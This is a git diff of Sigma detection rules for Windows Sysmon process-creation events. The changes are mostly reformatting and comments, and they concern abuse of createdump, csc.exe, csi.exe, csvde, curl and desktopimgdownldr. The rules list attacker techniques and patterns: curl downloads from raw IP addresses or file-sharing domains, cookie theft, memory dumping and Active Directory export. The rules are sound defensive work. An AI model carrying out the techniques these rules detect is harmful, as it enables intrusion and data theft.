b/sigma/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml @@ -1,8 +1,8 @@ title: CreateDump Process Dump id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 related: - - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e - type: similar + - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e + type: similar status: test description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory references: @@ -24,13 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \createdump.exe - - OriginalFileName: FX_VER_INTERNALNAME_STR + - Image|endswith: \createdump.exe + - OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - CommandLine|contains: - - ' -u ' + CommandLine|contains: + - ' -u ' # Short version of '--full' - ' --full ' - - ' -f ' + - ' -f ' # Short version of '--name' - ' --name ' - '.dmp ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml index c235629b6..98f01c074 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml @@ -1,8 +1,7 @@ title: Dynamic .NET Compilation Via Csc.EXE id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 status: test -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf @@ -26,47 +25,49 @@ detection: selection_img: Image|endswith: \csc.exe selection_susp_location_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # User execution - \Temporary Internet - - \Windows\Temp\ + - \Windows\Temp\ # Admin execution selection_susp_location_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ - - CommandLine|contains|all: - - :\Users\ - - \Pictures\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Pictures\ selection_susp_location_3: - CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: - ParentImage: C:\Windows\System32\sdiagnhost.exe + ParentImage: C:\Windows\System32\sdiagnhost.exe # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_w3p: - ParentImage: C:\Windows\System32\inetsrv\w3wp.exe + ParentImage: C:\Windows\System32\inetsrv\w3wp.exe # https://twitter.com/gabriele_pippi/status/1206907900268072962 filter_optional_chocolatey: - ParentImage: C:\ProgramData\chocolatey\choco.exe + ParentImage: C:\ProgramData\chocolatey\choco.exe # Chocolatey https://chocolatey.org/ filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_susp_location_* - and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 diff --git a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml index 5d50e89a5..d1af2eae3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml @@ -1,14 +1,12 @@ title: Csc.EXE Execution Form Potentially Suspicious Parent id: b730a276-6b63-41b8-bcf8-55930c8fc6ee status: test -description: Detects a potentially suspicious parent of "csc.exe", which could be - a sign of payload delivery. +description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. references: - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - https://reaqta.com/2017/11/short-journey-darkvnc/ - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - X__Junior (Nextron Systems) +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) date: 2019/02/11 modified: 2023/10/27 tags: @@ -27,8 +25,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \csc.exe - - OriginalFileName: csc.exe + - Image|endswith: \csc.exe + - OriginalFileName: csc.exe selection_parent_generic: ParentImage|endswith: - \cscript.exe @@ -47,44 +45,46 @@ detection: - '-Encoded ' - FromBase64String selection_parent_susp_location: - - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ - - ParentCommandLine|contains: - - :\PerfLogs\ - - :\Users\Public\ - - :\Windows\Temp\ - - \Temporary Internet - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Pictures\ + - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + - ParentCommandLine|contains: + - :\PerfLogs\ + - :\Users\Public\ + - :\Windows\Temp\ + - \Temporary Internet + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Pictures\ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentImage|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: - ParentImage: C:\Windows\System32\sdiagnhost.exe + ParentImage: C:\Windows\System32\sdiagnhost.exe # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_w3p: - ParentImage: C:\Windows\System32\inetsrv\w3wp.exe + ParentImage: C:\Windows\System32\inetsrv\w3wp.exe # https://twitter.com/gabriele_pippi/status/1206907900268072962 filter_optional_chocolatey: - ParentImage: C:\ProgramData\chocolatey\choco.exe + ParentImage: C:\ProgramData\chocolatey\choco.exe # Chocolatey https://chocolatey.org/ filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_parent_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml index dc3398688..13410fe6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csi_execution.yml @@ -1,11 +1,7 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e status: test -description: "Csi.exe is a signed binary from Microsoft that comes with Visual Studio\ - \ and provides C# interactive capabilities. It can be used to run C# code from\ - \ a file passed as a parameter in command line. Early version of this utility\ - \ provided with Microsoft \u201CRoslyn\u201D Community Technology Preview was\ - \ named 'rcsi.exe'" +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/ @@ -28,12 +24,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \csi.exe - - \rcsi.exe - - OriginalFileName: - - csi.exe - - rcsi.exe + - Image|endswith: + - \csi.exe + - \rcsi.exe + - OriginalFileName: + - csi.exe + - rcsi.exe selection_cli: Company: Microsoft Corporation condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml b/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml index 9b9796a8e..8750ededd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml @@ -27,7 +27,6 @@ detection: OriginalFileName: csi.exe condition: process_creation and selection falsepositives: - - Possible depending on environment. Pair with other factors such as net connections, - command-line args, etc. + - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml b/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml index c7a5595fd..c3e20dd84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_csvde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Csvde.EXE id: e5d36acd-acb4-4c6f-a13f-9eb203d50099 status: experimental -description: Detects the execution of "csvde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. references: - https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \csvde.exe - - OriginalFileName: csvde.exe + - Image|endswith: \csvde.exe + - OriginalFileName: csvde.exe selection_remote: - CommandLine|contains: ' -f' + CommandLine|contains: ' -f' filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml index fe8e1f3fb..af6a94a08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml @@ -1,8 +1,7 @@ title: Potential Cookies Session Hijacking id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 status: experimental -description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie - data. +description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-c\s - - CommandLine|contains: --cookie-jar + - CommandLine|re: \s-c\s + - CommandLine|contains: --cookie-jar condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml index 5deafafdf..526c72fc0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml @@ -1,9 +1,7 @@ title: Curl Web Request With Potential Custom User-Agent id: 85de1f22-d189-44e4-8239-dc276b45379b status: experimental -description: Detects execution of "curl.exe" with a potential custom "User-Agent". - Attackers can leverage this to download or exfiltrate data via "curl" to a domain - that only accept specific "User-Agent" strings +description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_header: - CommandLine|re: \s-H\s - CommandLine|contains: 'User-Agent:' + CommandLine|re: \s-H\s # Must be Regex as the flag needs to be case sensitive + CommandLine|contains: 'User-Agent:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml index d2c79980c..c2fb33e46 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml @@ -1,8 +1,8 @@ title: File Download From IP URL Via Curl.EXE id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 related: - - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 - type: similar + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + type: similar status: experimental description: Detects file downloads directly from IP address URL using curl.exe references: @@ -22,19 +22,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output filter_main_ext: - CommandLine|endswith: + # Note: This filter exists to avoid duplication with 5cb299fc-5fb1-4d07-b989-0644c68b6043 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml index 7948b4112..48ec40b21 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Curl.EXE id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using curl.exe +description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,19 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + # Note: If you add more extensions please consider adding them also in 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + CommandLine|endswith: - .bat - .bat" - .dat diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml index 0081e1693..e60096c69 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Curl.EXE id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb status: experimental -description: Detects potentially suspicious file download from file sharing domains - using curl.exe +description: Detects potentially suspicious file download from file sharing domains using curl.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -49,14 +48,14 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml index 797c1972a..5eed1eb43 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml @@ -17,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - - CommandLine|re: \s-k\s - - CommandLine|contains: --insecure + - CommandLine|re: \s-k\s + - CommandLine|contains: --insecure condition: process_creation and (all of selection_*) falsepositives: - Access to badly maintained internal or development systems diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml index 46b4ff317..3675033a9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml @@ -1,8 +1,7 @@ title: Insecure Proxy/DOH Transfer Via Curl.EXE id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 status: experimental -description: Detects execution of "curl.exe" with the "insecure" flag over proxy or - DOH. +description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --doh-insecure - --proxy-insecure condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml index c3c926177..3c911faa7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml @@ -1,8 +1,7 @@ title: Local File Read Using Curl.EXE id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 status: experimental -description: Detects execution of "curl.exe" with the "file://" protocol handler in - order to read local files. +description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. references: - https://curl.se/docs/manpage.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \curl.exe - - OriginalFileName: curl.exe + - Image|endswith: \curl.exe + - OriginalFileName: curl.exe selection_cli: - CommandLine|contains: file:/// + CommandLine|contains: file:/// condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml b/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml index cdfea6fee..518992006 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_curl_susp_download.yml @@ -1,13 +1,12 @@ title: Suspicious Curl.EXE Download id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: 9a517fca-4ba3-4629-9278-a68694697b81 - type: similar + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download + type: similar status: test -description: Detects a suspicious curl process start on Windows and outputs the requested - document to a local file +description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file references: - https://twitter.com/max_mal_/status/1542461200797163522 - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 @@ -29,10 +28,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_curl: - - Image|endswith: \curl.exe - - Product: The curl executable + - Image|endswith: \curl.exe + - Product: The curl executable selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%Public%' - '%Temp%' @@ -45,7 +44,7 @@ detection: - C:\ProgramData\ - C:\Windows\Temp\ selection_susp_extensions: - CommandLine|endswith: + CommandLine|endswith: - .dll - .gif - .jpeg @@ -57,14 +56,15 @@ detection: - .vbe - .vbs filter_optional_git_windows: + # Example FP + # CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt ParentImage: C:\Program Files\Git\usr\bin\sh.exe Image: C:\Program Files\Git\mingw64\bin\curl.exe - CommandLine|contains|all: + CommandLine|contains|all: - '--silent --show-error --output ' - gfw-httpget- - AppData - condition: process_creation and (selection_curl and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml index 5f4fdba42..6a0451ff6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml @@ -1,9 +1,7 @@ title: Remote File Download Via Desktopimgdownldr Utility id: 214641c2-c579-4ecb-8427-0cf19df6842e status: test -description: Detects the desktopimgdownldr utility being used to download a remote - file. An adversary may use desktopimgdownldr to download arbitrary files as an - alternative to certutil. +description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. references: - https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html author: Tim Rauch @@ -22,7 +20,7 @@ detection: selection: Image|endswith: \desktopimgdownldr.exe ParentImage|endswith: \desktopimgdownldr.exe - CommandLine|contains: /lockscreenurl:http + CommandLine|contains: /lockscreenurl:http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml index 2f6d11cd8..119da95aa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Desktopimgdownldr Command id: bb58aa4a-b80b-415a-a2c0-2f65a4c81009 status: test -description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters - used to download files from the Internet +description: Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet references: - https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - https://twitter.com/SBousseaden/status/1278977301745741825 @@ -21,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: ' /lockscreenurl:' + CommandLine|contains: ' /lockscreenurl:' selection1_filter: - CommandLine|contains: + CommandLine|contains: - .jpg - .jpeg - .png selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - reg delete - \PersonalizationCSP condition: process_creation and (( selection1 and not selection1_filter ) or selection_reg) @@ -36,7 +35,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml b/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml index 6beb3db2c..380a1de8e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml +++ 